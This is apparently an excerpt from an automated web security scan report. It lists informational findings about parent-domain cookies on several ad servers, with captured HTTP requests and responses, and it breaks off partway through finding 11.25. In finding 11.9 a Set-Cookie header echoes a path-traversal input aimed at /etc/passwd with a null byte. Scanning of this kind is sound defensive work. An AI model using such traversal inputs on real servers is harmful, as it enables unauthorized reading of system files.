11.9. http://a.collective-media.net/adj/cm.rev_bostonherald/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/cm.rev_bostonherald/;sz=728x90;ord=%23PCACHEBUSTER? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 430
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:48:43 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:48:43 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...

11.10. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.bostonherald/audience

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/iblocal.revinet.bostonherald/audience;sz=300x250;ord=%23PCACHEBUSTER? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 453
Date: Sat, 17 Sep 2011 01:00:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:00:33 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...

11.11. http://a.collective-media.net/adj/q1.bosherald/be_news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_news

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/q1.bosherald/be_news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/columnists/article/L48/2190420/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2190420? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/columnists/view.bg?articleid=1366212
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 424
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:01:04 GMT
Connection: close
Set-Cookie: dc=sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:01:04 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...

11.12. http://a.collective-media.net/adj/q1.bosherald/ent_fr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent_fr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/298814777/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=298814777? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 425
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:03:36 GMT
Connection: close
Set-Cookie: dc=sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:03:36 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...

11.13. http://a.collective-media.net/adj/q1.bosherald/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/news

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/regional/article/L46/293816110/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=293816110? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 422
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:00:30 GMT
Connection: close
Set-Cookie: dc=sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:00:30 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...

11.14. http://a.collective-media.net/cmadj/cm.rev_bostonherald/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.rev_bostonherald/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/cm.rev_bostonherald/;sz=728x90;net=cm;ord=%23PCACHEBUSTER;env=ifr;ord1=40053;cmpgurl=http%253A//bostonherald.com/includes/processAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 8274
Date: Sat, 17 Sep 2011 01:48:46 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...

11.15. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/iblocal.revinet.bostonherald/audience;sz=300x250;net=iblocal;ord=%23PCACHEBUSTER;env=ifr;ord1=937270;cmpgurl=http%253A//bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7334
Date: Sat, 17 Sep 2011 01:00:33 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...

11.16. http://a.collective-media.net/cmadj/q1.bosherald/be_news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_news

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/q1.bosherald/be_news;sz=300x250;net=q1;ord=2190420?;ord1=802665;cmpgurl=http%253A//bostonherald.com/news/columnists/view.bg%253Farticleid%253D1366212? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/columnists/view.bg?articleid=1366212
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7290
Date: Sat, 17 Sep 2011 01:01:04 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...

11.17. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent_fr

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=298814777?;env=ifr;ord1=650838;cmpgurl=http%253A//bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7295
Date: Sat, 17 Sep 2011 01:03:36 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...

11.18. http://a.collective-media.net/cmadj/q1.bosherald/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/news

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/q1.bosherald/news;sz=728x90;net=q1;ord=293816110?;env=ifr;ord1=121420;cmpgurl=http%253A//bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7295
Date: Sat, 17 Sep 2011 01:00:30 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...

11.19. http://a.tribalfusion.com/i.cid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=293233&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 206
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Tue, 14-Sep-2021 01:10:21 GMT;
Content-Type: text/html
Location: /z/i.cid?c=293233&d=30&page=landingPage
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>

11.20. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=pubmaticae&adSpace=audienceselect&tagKey=117090495&th=37103964303&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fads.pubmatic.com%2FAdServer%2Fjs%2Fsyncuppixels.html%3Fp%3D27330%26s%3D27331&f=2&p=19262702&a=1&rnd=19258315 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Tue, 14-Sep-2021 01:00:33 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 371
Expires: 0
Connection: keep-alive

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/a2mMQgmdIyVdf8XFMkXrbh0qZaMPrFAWb3SVdF3nrZbnRUbsYaJy5aUl2avQnTFLXUfaTtjXmPbLmGMmmHnJ3TZbe5t6m3mBGmUjZd0GnPXsF21GbOnab43
...[SNIP]...

11.21. http://a.tribalfusion.com/z/i.cid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /z/i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/i.cid?c=293233&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Tue, 14-Sep-2021 01:10:23 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;

11.22. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50832&l=20110917010136&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 118
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

sec=top
url=http://www.bostonherald.com/news/
dpid=90017
width=300
sub=
height=225
wgt=1
sitesection=bostonherald_top

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr1240167279_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:10:12 GMT; Path=/; HttpOnly
Set-Cookie: tr1240167279_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:10:12 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 01:10:12 GMT
Server: lighttpd/1.4.18
Content-Length: 8790

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>1240167279</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50832</z>
...[SNIP]...

11.23. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50832&l=20110917010230&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 132
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=k3eOxvzvTaul6aJcNabKkA

height=225
url=http://bostonherald.com/news/columnists/view.bg
sec=top
width=300
dpid=90017
sub=
wgt=1
sitesection=bostonherald_top

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr50738649_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:01:05 GMT; Path=/; HttpOnly
Set-Cookie: tr50738649_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:01:05 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 01:01:05 GMT
Server: lighttpd/1.4.18
Content-Length: 8909

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>50738649</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50832</z>

...[SNIP]...

11.24. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50832&l=20110917010742&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 140
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=k3eOxvzvTaul6aJcNabKkA

height=225
url=http://bostonherald.com/track/inside_track/view.bg
sec=oth
width=300
dpid=90017
sub=
wgt=1
sitesection=bostonheraldentertain

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr590622900_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:06:16 GMT; Path=/; HttpOnly
Set-Cookie: tr590622900_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:06:16 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 01:06:16 GMT
Server: lighttpd/1.4.18
Content-Length: 9019

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>590622900</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50832</z>

...[SNIP]...

11.25. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50832&l=20110917010535&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 123
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
